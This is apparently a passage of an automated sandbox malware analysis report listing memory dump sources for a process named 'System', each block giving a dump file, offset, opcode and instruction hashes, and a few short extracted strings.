              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 110a86085b5373f1810fb4a38008cd3a7e44d2e1ba256b06a7fcda8befcc79a4
              • Instruction ID: 17748d97392eb493e5f53d0adef2ef2ade8206db91fcc65d959b6adabb483897
              • Opcode Fuzzy Hash: 110a86085b5373f1810fb4a38008cd3a7e44d2e1ba256b06a7fcda8befcc79a4
              • Instruction Fuzzy Hash: DC11A770A1D68A8FE791EB6488682B977E0FF16310F0544B7D408C71A3EA38B5448781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6fa260c41404949969ca4d55592e79416bd196097bed9f869bebe93589de6930
              • Instruction ID: 1061b6639bc34b700f07a79c681504a9d322d5a4a024c9335ab32a066e519264
              • Opcode Fuzzy Hash: 6fa260c41404949969ca4d55592e79416bd196097bed9f869bebe93589de6930
              • Instruction Fuzzy Hash: 7A1191B0A1964A8FEBD4EF6484A92BE77B0FF19304F0005BED409D6692DB39A550C781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 09ffc9c00fcc3bee178668fbe76acc6e02f9dca3f086dd843a6a94d685a39b31
              • Instruction ID: aab93bbf9b435a1f49b8148730c42e8f8d9ceccb477fb644f4fddd4f35bf0c69
              • Opcode Fuzzy Hash: 09ffc9c00fcc3bee178668fbe76acc6e02f9dca3f086dd843a6a94d685a39b31
              • Instruction Fuzzy Hash: 2A11E371A0964A8FE7A1EB6484A92B97BF0FF16300F0505B6D558D71A2EE38A4408781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 91e25ba96770bc41d9c13f250a7e79a29017dada9480ec25f392947ec5973c8d
              • Instruction ID: aeb4c47434073ee9bd231ee2ec2b4e3c1861d1302454b63e18ec22045e2b3135
              • Opcode Fuzzy Hash: 91e25ba96770bc41d9c13f250a7e79a29017dada9480ec25f392947ec5973c8d
              • Instruction Fuzzy Hash: C6119E70A19A5A8FEBD4EF6484696BE77F1FF19305F4004BAD80DD2292DE38A550C781
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 917d10d61471832b2ea0bb7d58b665d7987b5589e5f97dbecd79619d6c127cf3
              • Instruction ID: 49ea2f3ce8db4efaa9bb0338126a04332cbb1c931e243876bcf74aa5cc574f16
              • Opcode Fuzzy Hash: 917d10d61471832b2ea0bb7d58b665d7987b5589e5f97dbecd79619d6c127cf3
              • Instruction Fuzzy Hash: CC116570A1864D9FEB84EF68C4A92BE77F1FF1A300F51087AD409D6192DF38A554C740
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cbde385cfab4c851bca94549d058f94c3d5b4b3c2df162e3fec37287234dc57f
              • Instruction ID: 88bb4c422919a6a18517f063d902cdaa3e9a80967d895dc18a89fd245e893afb
              • Opcode Fuzzy Hash: cbde385cfab4c851bca94549d058f94c3d5b4b3c2df162e3fec37287234dc57f
              • Instruction Fuzzy Hash: 66016170A1868E8FDB94EF74C4A96BE77E0FF19300F4008BED519D6192DB38A540C740
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38f3b75b538ca66c17a01c0184bcbd30d1661ce5e71cbe16a1de5582f78f4930
              • Instruction ID: 0ea51f43c88b579dcbaea40e65354c5193aaed2fd15b0b9ab15dcca912e28c73
              • Opcode Fuzzy Hash: 38f3b75b538ca66c17a01c0184bcbd30d1661ce5e71cbe16a1de5582f78f4930
              • Instruction Fuzzy Hash: 3511AC71A0E6898FDB85DB2488A82FD7BF0FF16300F0008BAD409C6292DA39A904D740
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aad8440dab6134736c0413c4802cfcb53815de9672553a1d16de1c73be953473
              • Instruction ID: fcc3cd0c288ab86b68af26f018a3f137005a9e01dbe858dead7b2ac430fedd52
              • Opcode Fuzzy Hash: aad8440dab6134736c0413c4802cfcb53815de9672553a1d16de1c73be953473
              • Instruction Fuzzy Hash: 5F11AD71A1C68D8FEB94EF68C8A92BD7BF0FF1A310F0104BED50AC2192DA39A550C740
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 86907206f8e2ce5fb8b64602424b9e6038d23696b0289bcba9870291ac936615
              • Instruction ID: 4a73ab0103962c4668003449fd7f9adb82dd8c4e8d7e67b9854f8c55e91724ff
              • Opcode Fuzzy Hash: 86907206f8e2ce5fb8b64602424b9e6038d23696b0289bcba9870291ac936615
              • Instruction Fuzzy Hash: 1F015E70A0850ECFEB98EF24C0A56B977A1FF5A305F50457ED40ED2191CE39B564DB80
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bd0366a64a3d528392972af58b256a0e996815ab1c8f0a3a6e7d912785471a71
              • Instruction ID: 7e1b1e6626252da8ff22f85ff1354e98166bfb10fde697d5cea4a5e21f37a889
              • Opcode Fuzzy Hash: bd0366a64a3d528392972af58b256a0e996815ab1c8f0a3a6e7d912785471a71
              • Instruction Fuzzy Hash: E001D470A196098FDB99EF60C4A92BE77A0FF1A304F5104BED40AC62D2EF38A510C780
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: df2493e0963c1c91a339f43cf77660cea31e42a855af3e263d046ba6320c937e
              • Instruction ID: a673b218583291713dacfd7fc29c623179a770212484b254837a8e3e5840773f
              • Opcode Fuzzy Hash: df2493e0963c1c91a339f43cf77660cea31e42a855af3e263d046ba6320c937e
              • Instruction Fuzzy Hash: 65018B70A1864A8FE791FB7484DC6BA7BE0EF1A300F4149B6D508C61A2EB38F584C780
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5efec347a3efb2d87f6cc6f73a3a86b7867aa2e77980edae6e861b11f66fd071
              • Instruction ID: f9dc64d660921ffce4f953f3a55505cfe6bd6162e72093a6b1d5e00265357db7
              • Opcode Fuzzy Hash: 5efec347a3efb2d87f6cc6f73a3a86b7867aa2e77980edae6e861b11f66fd071
              • Instruction Fuzzy Hash: 6001D471A1868ECFE7D1BB2884989B97BE0EF1A310F4149B6D518C6092EE38F044C780
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 886cb8e401c0d29e181e2d999a10c43fa2962b0ddb814d0c795fe67e61277445
              • Instruction ID: 6d6a591d9bf166478972b7e7caa1dd29f25e2d88010a3bc8a6c5817b3150e83c
              • Opcode Fuzzy Hash: 886cb8e401c0d29e181e2d999a10c43fa2962b0ddb814d0c795fe67e61277445
              • Instruction Fuzzy Hash: E7018F71A1D6498FE782FB7488A95A97BE1EF0B300F0549F6D408CB0A3DA3CB444C751
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ea110656f94ea530e5b524a184ea1623bd042073faefb18341ef95c1eabc9e26
              • Instruction ID: f3d6cb5370f0629b9333d02939167cd0ef3abde781f5232a1418594489b5d026
              • Opcode Fuzzy Hash: ea110656f94ea530e5b524a184ea1623bd042073faefb18341ef95c1eabc9e26
              • Instruction Fuzzy Hash: BE0175B1A4E6498FE791A77488A91E97BF0EF16300F0544F6D509C7162DA38E548C751
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 848a030f9d15a90a7747405d2cdf0c4aedcf12015d86fdd237357d40c154c80b
              • Instruction ID: a5900eade6a3b2487f7db60d3a9119ce29d8eba552f0a1c92246e7a3b376e169
              • Opcode Fuzzy Hash: 848a030f9d15a90a7747405d2cdf0c4aedcf12015d86fdd237357d40c154c80b
              • Instruction Fuzzy Hash: A001D430A09249CFDB99DF64C4A42FE3BA0FF06300F0114BED51AC6292DA39A554C780
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b2d3690e3aac52f49dac0d049a9da66f61b181b8e6fbe78ad2083aecd02746d0
              • Instruction ID: c25e43723a6125e95cc3e017efc9e73b18d8e0c952d59c979d224e4a7b55a458
              • Opcode Fuzzy Hash: b2d3690e3aac52f49dac0d049a9da66f61b181b8e6fbe78ad2083aecd02746d0
              • Instruction Fuzzy Hash: EA018170A1450ECEEB98FB64C4A82BA73A4FF19305F104C7ED50EE22D1DE39B550C640
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2f2fad06460ea2fe1c1ac45e68120ef5596ec14382a153289c8c43d1b76a1527
              • Instruction ID: 339ba46b9f96ea1884734815111757da7ff0169d9367bbe69de3018cec703850
              • Opcode Fuzzy Hash: 2f2fad06460ea2fe1c1ac45e68120ef5596ec14382a153289c8c43d1b76a1527
              • Instruction Fuzzy Hash: 28016D70A1890ECAEB98EB6484A96B973A0FF1A305F10487ED40ED21D1DF39B550D640
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aff93a15471616730a0635180e0c2e506a5bb7cb6deaa9811ecc5037dc61cadf
              • Instruction ID: d2f433af157f138d4d6a51be7ca527cbebd9d60825ce2199fa322e9d650de01d
              • Opcode Fuzzy Hash: aff93a15471616730a0635180e0c2e506a5bb7cb6deaa9811ecc5037dc61cadf
              • Instruction Fuzzy Hash: 48F0C270A4964ECFEB94DF24C4A52BA37A0FF57304F80017AE90CC2192DB39E964D780
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8725dd1e49dbce8b13e96ab6838de7618d29e6cd798caecd09e5dca4ba976005
              • Instruction ID: 256011da352b979694d3857037d6ff50f91db3b55743164703bf94b9bcb81bfc
              • Opcode Fuzzy Hash: 8725dd1e49dbce8b13e96ab6838de7618d29e6cd798caecd09e5dca4ba976005
              • Instruction Fuzzy Hash: 9BF03170A0964ACFEF54EF68D4A92FA7BA0FF06314F04057AE919C2152DB786560D780
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b7fd0823b1b93ee588945a1ea4769201aff8880a996ba32f055c0420626ade77
              • Instruction ID: b9b5e6b1ef98ddc6e9f77b727f06589e5b05da55cc0d4da13d794b36763cbe11
              • Opcode Fuzzy Hash: b7fd0823b1b93ee588945a1ea4769201aff8880a996ba32f055c0420626ade77
              • Instruction Fuzzy Hash: D1F0AF71A1E64EDEEBA1EB3884DA5ED77E0EF4A300F0048B2D508C2052EE38B454D680
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3a1dfc15689188b0977a325642bd7dce2fc89d44b39e5e492ebc23112d56bb68
              • Instruction ID: 0b84950538ea7ba3c87341646845281601f0824a8a249b32fc8b1cf10b21ca19
              • Opcode Fuzzy Hash: 3a1dfc15689188b0977a325642bd7dce2fc89d44b39e5e492ebc23112d56bb68
              • Instruction Fuzzy Hash: A5F0907190D3898FEB99EF24C8B92A93BA4FF07210F4509FAD609C61D2DB3CA454C791
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d1a784c8c15a9aeee82032a15ff61d10198ec1529bf50b9ae42fb3fcd59fa39e
              • Instruction ID: 55c790928a21c791db5ed011392faaa7d6af8181f8624b18fb66385dbc98653e
              • Opcode Fuzzy Hash: d1a784c8c15a9aeee82032a15ff61d10198ec1529bf50b9ae42fb3fcd59fa39e
              • Instruction Fuzzy Hash: 45F05E70A1954E8EEB84EF6898582FE76A0FF15305F00053AE82DC22D0DF38A550C681
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fa847d58b99639c95af9aeb9c7dea607b7fc0168b02285afde4a9977f92771c8
              • Instruction ID: e9b7101e98bae1ef167db31ee1db34ec6f210baa9e60c41a566d2130f76b3bc8
              • Opcode Fuzzy Hash: fa847d58b99639c95af9aeb9c7dea607b7fc0168b02285afde4a9977f92771c8
              • Instruction Fuzzy Hash: 3DF0F071A0D68A8FEB99AF2088A52B93BA0BF46304F0008BAD909C20D2DB3DA414C340
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ab344336a9c1ad8bba5d4cf774d3ec68550ddde18bd1372fcd09820d1935ce7b
              • Instruction ID: 92493151104bd069dd7e70e23974698e1eb6a5c5e34f1792a83c1c3294e15d8e
              • Opcode Fuzzy Hash: ab344336a9c1ad8bba5d4cf774d3ec68550ddde18bd1372fcd09820d1935ce7b
              • Instruction Fuzzy Hash: D4D0626095C41BC9DBA0E614C494EFD7264AB56300F2095B1911DE2196DD7879C56B80
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a709648e009f01986e12338013f2aff8a82a8c6e0990f82fd7cf9820204bf8f0
              • Instruction ID: 4f204f9d8de6efadd2960b7e7242eb8d40dcfdfd75ca48e1945d64d1aa3b8436
              • Opcode Fuzzy Hash: a709648e009f01986e12338013f2aff8a82a8c6e0990f82fd7cf9820204bf8f0
              • Instruction Fuzzy Hash: 56C012D2F1D51D8EEB94D90844D51BC66E1EB14244B000031D00CC3251DE1874016340
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: H$K$L${
              • API String ID: 0-964284359
              • Opcode ID: d8ecf950a023fd19cefc18c5546fa02bdf1ed46dc339ae028b6d4c7a6fdc16c2
              • Instruction ID: 8ddb1f35b2d5f42fa3203e56c6d9b7a91a9c71a496e719c56baa5729303c5e68
              • Opcode Fuzzy Hash: d8ecf950a023fd19cefc18c5546fa02bdf1ed46dc339ae028b6d4c7a6fdc16c2
              • Instruction Fuzzy Hash: 9401C0B4E1922ACAEF688F14D5A47FD7675AF56300F0044B9C20DA6281DB3C6A85DF81
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: Nh4$p\h4
              • API String ID: 0-3373656701
              • Opcode ID: b230fc0ce03960c42c5c9153b79afbff570c4a90f90ad7d338d867ab7e87fa86
              • Instruction ID: 4806b6d830fdaf4d0412d85b7108e6298bd104c3286c3c879edfcdc05957eec4
              • Opcode Fuzzy Hash: b230fc0ce03960c42c5c9153b79afbff570c4a90f90ad7d338d867ab7e87fa86
              • Instruction Fuzzy Hash: 5A224D71E196498FEB98DB68C4A47F9BBF1FF59304F1440BAD00DE7292DA386844DB41
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: pyi4
              • API String ID: 0-2228226052
              • Opcode ID: e90e723b29662f0508da33fc61a07bcd856a5e9a6a962638745678c07fc619ee
              • Instruction ID: 6af1ccaf9ead1ab4fcb622a80be58aa5bdb458feeb5c98e88e8bc99b2d15110c
              • Opcode Fuzzy Hash: e90e723b29662f0508da33fc61a07bcd856a5e9a6a962638745678c07fc619ee
              • Instruction Fuzzy Hash: 65E10771A0D64A8FE795DF68C8A86F97BF0FF1A300F0445BAD509D7292DA38B444C780
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: (z4
              • API String ID: 0-3915740135
              • Opcode ID: 24b69e408191db63f546e7d99418712a996a11dc1acd371953b772a53dfd805a
              • Instruction ID: 86280733425d48dff7101e7569c446a208030ae481bf68c827c44be0e6734776
              • Opcode Fuzzy Hash: 24b69e408191db63f546e7d99418712a996a11dc1acd371953b772a53dfd805a
              • Instruction Fuzzy Hash: 19D1E371A0D64A8FE781EB78C8A96FA7BF0EF16310F0445B6D508D72A2DA3CB554D780
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1219c8218259cf874aa025980db305efe70e87a95971a91a3ecc0327b193849b
              • Instruction ID: 2ef3a6229c1fffa4e8f90db8827ddf960e1340172051b00c3bdd99d8503d8208
              • Opcode Fuzzy Hash: 1219c8218259cf874aa025980db305efe70e87a95971a91a3ecc0327b193849b
              • Instruction Fuzzy Hash: 07022772B0DA5A9FE751FB7CA4A50FE7BA0EF46324B0401BBC148CB193DA2874498790
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 84255e8235df4e5749afd51d93c607925e5a558bbe893e480b9fc3dd5f39caea
              • Instruction ID: f210a8ca93a95fa535138a5e25caedacd9f623c4afa23b2ed11613dbc50b7e36
              • Opcode Fuzzy Hash: 84255e8235df4e5749afd51d93c607925e5a558bbe893e480b9fc3dd5f39caea
              • Instruction Fuzzy Hash: 6F02C072A0D68A9FE795AB6898651FA3BB0FF07324F0441BBD548CB193DA3C6445C781
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 027db3f30138677291d9627ee8aba2744224875899c3e5943217698686bf0282
              • Instruction ID: b0ea1699220a11ee13bd881adc90a696af006693492e497c5587138c7a12aaf7
              • Opcode Fuzzy Hash: 027db3f30138677291d9627ee8aba2744224875899c3e5943217698686bf0282
              • Instruction Fuzzy Hash: 0802D171A0DA4E8FE795EF68C8A83A97BE0FF5A300F4001BAC409D7292DB786445C741
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a4615fa23bfcba2435630409e72eaecdfa549d62dffd79a569b119e10b117025
              • Instruction ID: 9b0597e48c8b3e52e7c90576562a931d4a4414c6d40cf1cfd1edc0bab27cf330
              • Opcode Fuzzy Hash: a4615fa23bfcba2435630409e72eaecdfa549d62dffd79a569b119e10b117025
              • Instruction Fuzzy Hash: 3FD1C970A0864A8FEBA5EF2484A92BD7BF1FF16300F0045BED509D71A2DE787954D782
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ecf7a23147ab18d3bd793c9230e1de3756639d3fed6429550d49898189f2204a
              • Instruction ID: c2346edb21879ccdd327930f5731a670179f67cc19fa5415412025f1ae28e592
              • Opcode Fuzzy Hash: ecf7a23147ab18d3bd793c9230e1de3756639d3fed6429550d49898189f2204a
              • Instruction Fuzzy Hash: 94D17170A19649CFE795EB64C4A96FA7BF0FF0A300F0144BAD609D7292DA38B544CB80
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8715e498085a8b7de97c3aa6293b85e01cf48475f1e698a6ff77c8182e51e8ab
              • Instruction ID: 047c5c37db55cb9b473aeba8f0026bae860be7f8b352113d99c097e58090a710
              • Opcode Fuzzy Hash: 8715e498085a8b7de97c3aa6293b85e01cf48475f1e698a6ff77c8182e51e8ab
              • Instruction Fuzzy Hash: B8919D70A1964ACFDB94EF24C4A96FA7BE1FF1A300F00457AD50AD3192DE78A945CB80
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c06e54e3be40fbec73ec528103bcf6507af6cb9d7675ded74cf7c105fd0dd83e
              • Instruction ID: 09a49a259633baedccc6101231240171dc8cf7212442c3f1dc01425040a46820
              • Opcode Fuzzy Hash: c06e54e3be40fbec73ec528103bcf6507af6cb9d7675ded74cf7c105fd0dd83e
              • Instruction Fuzzy Hash: 8981A270A1D74ACFEB559F2488A92FA3BE0FF0A300F01457AE949C2192DF78A945D7C1
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: P$j${
              • API String ID: 0-2719876955
              • Opcode ID: 4f31c46347debe9f07d3145b7453952ebf05d33b2631d285b7cd4603e752190a
              • Instruction ID: d1e200fc29c8c904bf725d33b74e8cd1ce99589df2bc24c432a49571a31a043c
              • Opcode Fuzzy Hash: 4f31c46347debe9f07d3145b7453952ebf05d33b2631d285b7cd4603e752190a
              • Instruction Fuzzy Hash: 9321CDB0D1A229CFEBA4DF14C8947E976B1AF55301F0041F9D60DD2281CB786A94DF85
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: 1
              • API String ID: 0-2212294583
              • Opcode ID: e791c6295a61a9f11e98f9ffcf2b76906e738f39c70009d2672b4678b7612fbf
              • Instruction ID: 5940808f275de90bc62bf63ce5407332fbe377698e542e2df28e9234c96f12ce
              • Opcode Fuzzy Hash: e791c6295a61a9f11e98f9ffcf2b76906e738f39c70009d2672b4678b7612fbf
              • Instruction Fuzzy Hash: ED412A71A19A598FDBA8DB18CC95BAEB7B1FB54301F1002EAD04DE3291DE356EC18F40
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
